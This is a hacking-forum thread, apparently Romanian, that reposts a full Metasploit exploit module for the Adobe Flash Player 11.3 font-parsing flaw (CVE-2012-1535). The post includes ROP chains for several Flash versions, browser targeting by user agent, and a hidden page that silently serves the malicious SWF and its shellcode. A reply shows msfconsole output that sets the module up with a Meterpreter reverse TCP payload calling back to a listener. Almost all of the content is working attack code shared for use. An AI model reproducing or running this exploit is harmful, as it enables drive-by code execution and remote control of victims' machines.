Jump to content
DarkLegion

Adobe Flash Player 11.3 Font Parsing Code Execution

By DarkLegion, in Exploituri

Recommended Posts

DarkLegion Newbie

DarkLegion

Posted
Posted (edited)

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

# Penetration Testing Software | Metasploit

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Adobe Flash Player 11.3 Font Parsing Code Execution",
			'Description'    => %q{
					This module exploits a vulnerability found in the ActiveX component of Adobe
				Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF,
				it is possible to gain arbitrary remote code execution under the context of the
				user, as exploited in the wild.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Alexander Gavrun', #Through iDefense
					'sinn3r',
					'juan vazquez'
				],
			'References'     =>
				[
					[ 'CVE', '2012-1535' ],
					[ 'OSVDB', '84607'],
					[ 'BID', '55009'],
					[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ],
					[ 'URL', 'http://vrt-blog.snort.org/2012/08/cve-2012-1535-flash-0-day-in-wild.html' ],
					[ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ]
				],
			'Payload'        =>
				{
					'Space'    => 1024
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Tested successfully on:
					# Flash 11.3.300.268
					# Flash 11.3.300.265
					# Flash 11.3.300.257
					[ 'Automatic', {} ],
					[
						'IE 6 on Windows XP SP3',
						{
							'Rop'    => nil
						}
					],
					[
						'IE 7 on Windows XP SP3',
						{
							'Rop'    => nil
						}
					],
					[
						'IE 8 on Windows XP SP3',
						{
							'Rop' => true
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Aug 9 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]),
			], self.class)
	end

	def nop
		return make_nops(4).unpack("L")[0].to_i
	end

	def get_payload(t, flash_version=nil)
		if t['Rop'].nil?
			p = [
				0x0c0c0c0c, # mapped at 1e0d0000
				0x0c0c0c0c,
				0x0c0c0c0c, # mapped at 1e0d0008
			].pack("V*")

			p << payload.encoded
		else
			if datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/

				print_status("Using Rop Chain For Flash: #{flash_version}")
				stack_pivot = [
					0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
					0x0c0c0c0c,
					0x1001d891, # xchg eax, esp # ret (1e0d0008)
				].pack("V*")

				rop = [
					0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx)
					0x106e3384, # <- *&VirtualProtect()
					0x1029de2f, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_257.ocx)
					0x106add37, # XCHG EAX,ESI # RETN (Flash32_11_3_300_257.ocx)
					0x1064e000, # POP EBP # RETN (Flash32_11_3_300_257.ocx)
					0x10175c57, # ptr to 'jmp esp' (from Flash32_11_3_300_257.ocx)
					0x106a4010, # POP EBX # RETN (Flash32_11_3_300_257.ocx)
					0x00000201, # <- change size to mark as executable if needed (-> ebx)
					0x104de800, # POP ECX # RETN (Flash32_11_3_300_257.ocx)
					0x10955000, # W pointer (lpOldProtect) (-> ecx)
					0x10649003, # POP EDI # RETN (Flash32_11_3_300_257.ocx)
					0x10649004, # ROP NOP (-> edi)
					0x10649987, # POP EDX # RETN (Flash32_11_3_300_257.ocx)
					0x00000040, # newProtect (0x40) (-> edx)
					0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx)
					nop,        # NOPS (-> eax)
					0x1060e809, # PUSHAD # RETN (Flash32_11_3_300_257.ocx)
				].pack("V*")

			elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/

				print_status("Using Rop Chain For Flash: #{flash_version}")
				stack_pivot = [
					0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
					0x0c0c0c0c,
					0x1001d6d3, # xchg eax, esp # ret (1e0d0008)
				].pack("V*")

				rop = [
					0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx)
					0x106e338c, # <- *&VirtualProtect()
					0x1029ea04, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_265.ocx)
					0x103d60b8, # XCHG EAX,ESI # RETN (Flash32_11_3_300_265.ocx)
					0x105cc000, # POP EBP # RETN (Flash32_11_3_300_265.ocx)
					0x1001c5cd, # ptr to 'jmp esp' (from Flash32_11_3_300_265.ocx)
					0x10398009, # POP EBX # RETN (Flash32_11_3_300_265.ocx)
					0x00000201, # <- change size to mark as executable if needed (-> ebx)
					0x10434188, # POP ECX # RETN (Flash32_11_3_300_265.ocx)
					0x10955000, # W pointer (lpOldProtect) (-> ecx)
					0x105c1811, # POP EDI # RETN (Flash32_11_3_300_265.ocx)
					0x105c1812, # ROP NOP (-> edi)
					0x10650602, # POP EDX # RETN (Flash32_11_3_300_265.ocx)
					0x00000040, # newProtect (0x40) (-> edx)
					0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx)
					nop,        # NOPS (-> eax)
					0x1062800f, # PUSHAD # RETN (Flash32_11_3_300_265.ocx)
				].pack("V*")

			elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/

				print_status("Using Rop Chain For Flash: #{flash_version}")
				stack_pivot = [
					0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
					0x0c0c0c0c,
					0x1001d755, # xchg eax, esp # ret (1e0d0008)
				].pack("V*")
				rop = [
					0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx)
					0x106e438c, # <- *&VirtualProtect()
					0x10198e00, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_268.ocx)
					0x106ddf15, # XCHG EAX,ESI # RETN (Flash32_11_3_300_268.ocx)
					0x1035f000, # POP EBP # RETN (Flash32_11_3_300_268.ocx)
					0x10175c28, # ptr to 'jmp esp' (from Flash32_11_3_300_268.ocx)
					0x105e0013, # POP EBX # RETN (Flash32_11_3_300_268.ocx)
					0x00000201, # <- change size to mark as executable if needed (-> ebx)
					0x10593801, # POP ECX # RETN (Flash32_11_3_300_268.ocx)
					0x1083c000, # RW pointer (lpOldProtect) (-> ecx)
					0x10308b0e, # POP EDI # RETN (Flash32_11_3_300_268.ocx)
					0x10308b0f, # ROP NOP (-> edi)
					0x10663a00, # POP EDX # RETN (Flash32_11_3_300_268.ocx)
					0x00000040, # newProtect (0x40) (-> edx)
					0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx)
					nop,        # NOPS (-> eax)
					0x1069120b, # PUSHAD # RETN (Flash32_11_3_300_268.ocx)
				].pack("V*")

			else

				print_status("Default back to JRE ROP")
				stack_pivot = [
					0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)
					0x0c0c0c0c,
					0x7c348b05, # xchg eax, esp # ret (1e0d0008)
				].pack("V*")

				rop = [
					0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
					0x00001000, # (dwSize)
					0x7c347f98, # RETN (ROP NOP)
					0x7c3415a2, # JMP [EAX]
					0xffffffff,
					0x7c376402, # skip 4 bytes
					0x7c345255, # INC EBX # FPATAN # RETN
					0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
					0x7c344f87, # POP EDX # RETN
					0x00000040, # flNewProtect
					0x7c34d201, # POP ECX # RETN
					0x7c38b001, # &Writable location
					0x7c347f97, # POP EAX # RETN
					0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
					0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
					0x7c345c30, # ptr to 'push esp #  ret '
				].pack("V*")

			end
			p = stack_pivot
			p << rop
			p << payload.encoded
		end
		return p
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[3]  #IE 8 on Windows XP SP3
		else
			return nil
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		print_status("User-agent: #{agent}")
		my_target = get_target(agent)

		print_status("Client requesting: #{request.uri}")

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		# The SWF request itself
		if request.uri =~ /\.swf$/
			print_status("Sending SWF")
			send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
			return
		end

		# The TXT payload request
		if request.uri =~ /\.txt$/
			flash_version = request.headers['x-flash-version']
			shellcode = get_payload(my_target, flash_version).unpack('H*')[0]
			print_status("Sending Payload")
			send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
			return
		end

		swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"

		html = %Q|
		<html>
		<head>
		</head>
		<body>
		<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
		<param name="movie" value="#{swf_uri}">
		</object>
		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		# we need to handle direct /pay.txt requests
		proc = Proc.new do |cli, req|
			on_request_uri(cli, req)
		end
		add_resource({'Path' => "/pay.txt", 'Proc' => proc}) rescue nil

		print_status("Sending HTML")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def exploit
		@swf = create_swf
		print_status("SWF Loaded: #{@swf.length.to_s} bytes")
		super
	end

	def create_swf
		path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "trigger.swf" )
		fd = ::File.open( path, "rb" )
		swf = fd.read(fd.stat.size)
		fd.close
		return swf
	end

	def cleanup
		vprint_status("Removing txt resource")
		remove_resource('/pay.txt') rescue nil
		super
	end

end

sursa

Edited by DarkLegion
Link to comment
Share on other sites
neo.hapsis Newbie

neo.hapsis

Posted
Posted 

+ -- --=[ 933 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf  use exploit/windows/browser/adobe_flash_otf_font
msf  exploit(adobe_flash_otf_font) > show options

Module options (exploit/windows/browser/adobe_flash_otf_font):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ROP         SWF              yes       The ROP chain to use (accepted: SWF, JRE)
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         0                no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.170    yes       The listen address
   LPORT     29984            yes       The listen port


Exploit target:

Le-am adaugat in loc sa fac update.LOL

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...